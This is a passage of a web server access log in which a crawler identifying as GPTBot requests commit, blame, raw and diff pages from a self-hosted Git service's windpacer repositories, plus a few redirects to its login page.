9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 10645739] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" +[17/Feb/2026:15:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43162] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43159] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" +[17/Feb/2026:15:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=html%2fstatus.json" [Client 74.7.227.38] [Length 17268] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" +[17/Feb/2026:15:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96.diff" [Client 74.7.227.38] [Length 115569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:15:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96.patch" [Client 74.7.227.38] [Length 207177] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:15:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 11556] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 11521] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log.3" [Client 74.7.227.38] [Length 56760] [Gzip 9.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:15:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log" [Client 74.7.227.38] [Length 42666] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" +[17/Feb/2026:15:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log.1" [Client 74.7.227.38] [Length 50335] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:15:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log.6" [Client 74.7.227.38] [Length 52526] [Gzip 8.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:15:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log.7" [Client 74.7.227.38] [Length 21179] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:15:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fnginx%2fproxy_host" [Client 74.7.227.38] [Length 35627] [Gzip 8.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" +[17/Feb/2026:15:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log.4" [Client 74.7.227.38] [Length 37175] [Gzip 7.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:15:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2fnginx%2fproxy_host" [Client 74.7.227.38] [Length 23995] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" +[17/Feb/2026:15:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log.2" [Client 74.7.227.38] [Length 46124] [Gzip 9.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:15:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 10392] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log.5" [Client 74.7.227.38] [Length 50404] [Gzip 8.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:15:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 13146] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" +[17/Feb/2026:15:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" +[17/Feb/2026:15:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10417] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm" +[17/Feb/2026:15:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10412] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm" +[17/Feb/2026:15:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" +[17/Feb/2026:15:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 13827] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" +[17/Feb/2026:15:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" +[17/Feb/2026:15:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11864] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" +[17/Feb/2026:15:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json?display=source" [Client 74.7.227.38] [Length 11071] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" +[17/Feb/2026:15:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" +[17/Feb/2026:15:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11278] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" +[17/Feb/2026:15:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 15548] [Gzip 9.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:15:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 3727] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:15:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" +[17/Feb/2026:15:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json?display=source" [Client 74.7.227.38] [Length 11680] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" +[17/Feb/2026:15:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" +[17/Feb/2026:15:20:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:15:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/asset_pilot_docker/README.md" +[17/Feb/2026:15:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 12547] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:15:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 13582] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:15:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 15595] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" +[17/Feb/2026:15:20:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" +[17/Feb/2026:15:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] 